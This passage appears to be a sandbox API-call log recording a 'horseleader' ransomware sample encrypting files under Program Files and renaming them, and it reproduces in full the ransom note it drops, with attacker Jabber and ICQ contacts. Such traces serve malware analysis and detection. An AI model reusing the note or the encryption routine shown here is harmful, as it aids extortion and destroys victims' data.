out: lpNewFilePointer=0x0) returned 1 [0225.871] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.873] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.873] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.874] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.874] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.874] CloseHandle (hObject=0x158) returned 1 [0225.874] GetProcessHeap () returned 0x780000 [0225.874] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.874] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.horseleader") returned 74 [0225.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.horseleader")) returned 1 [0225.875] GetProcessHeap () returned 0x780000 [0225.875] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.875] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0225.875] lstrcmpiW (lpString1="DWTRIG20.EXE", lpString2="Windows") returned -1 [0225.875] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 66 [0225.875] StrStrIW (lpFirst="DWTRIG20.EXE", lpSrch=".horseleader") returned 0x0 [0225.875] lstrcmpW (lpString1="DWTRIG20.EXE", lpString2="#Decrypt#.txt") returned 1 [0225.876] lstrcmpW (lpString1="DWTRIG20.EXE", lpString2="_uninstalling_.png") returned 1 [0225.876] lstrlenW (lpString=".testttjffg") returned 11 [0225.876] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpSrch=".testttjffg") returned 0x0 [0225.876] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.876] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.877] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 66 [0225.877] StrStrW (lpFirst="DWTRIG20.EXE", lpSrch=".txt") returned 0x0 [0225.877] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=629664) returned 1 [0225.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.877] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.880] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.880] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.881] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4a5d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.881] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.884] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.884] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.884] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x94ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.884] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.886] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.887] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.887] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.887] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.887] CloseHandle (hObject=0x158) returned 1 [0225.887] GetProcessHeap () returned 0x780000 [0225.887] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.887] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.horseleader") returned 78 [0225.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.horseleader")) returned 1 [0225.890] GetProcessHeap () returned 0x780000 [0225.890] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.890] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0225.890] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0225.890] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\#Decrypt#.txt") returned 67 [0225.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0225.891] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0225.891] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0225.892] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0225.892] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0225.892] CloseHandle (hObject=0x21c) returned 1 [0225.893] GetProcessHeap () returned 0x780000 [0225.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0225.893] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0225.893] lstrcmpiW (lpString1="EQUATION", lpString2="Windows") returned -1 [0225.893] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned 59 [0225.893] lstrcmpW (lpString1="EQUATION", lpString2=".") returned 1 [0225.893] lstrcmpW (lpString1="EQUATION", lpString2="..") returned 1 [0225.893] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.893] GetProcessHeap () returned 0x780000 [0225.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0225.893] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*") returned 61 [0225.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0225.893] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.893] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\.") returned 61 [0225.894] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.894] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0225.894] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.894] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\..") returned 62 [0225.894] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.894] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.894] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0225.894] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0225.894] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned 64 [0225.894] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0225.894] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0225.894] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.894] GetProcessHeap () returned 0x780000 [0225.894] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.894] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*") returned 66 [0225.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0225.896] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.896] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\.") returned 66 [0225.896] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.896] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName="..", cAlternateFileName="")) returned 1 [0225.896] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.896] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\..") returned 67 [0225.896] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.896] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.896] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0225.896] lstrcmpiW (lpString1="EEINTL.DLL", lpString2="Windows") returned -1 [0225.896] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 75 [0225.896] StrStrIW (lpFirst="EEINTL.DLL", lpSrch=".horseleader") returned 0x0 [0225.896] lstrcmpW (lpString1="EEINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0225.896] lstrcmpW (lpString1="EEINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0225.896] lstrlenW (lpString=".testttjffg") returned 11 [0225.896] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0225.898] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0225.898] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0225.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0225.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 75 [0225.898] StrStrW (lpFirst="EEINTL.DLL", lpSrch=".txt") returned 0x0 [0225.899] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=64096) returned 1 [0225.899] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.899] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.901] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.901] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.902] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xaa60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.903] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0225.903] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0225.903] WriteFile (in: hFile=0x1a4, 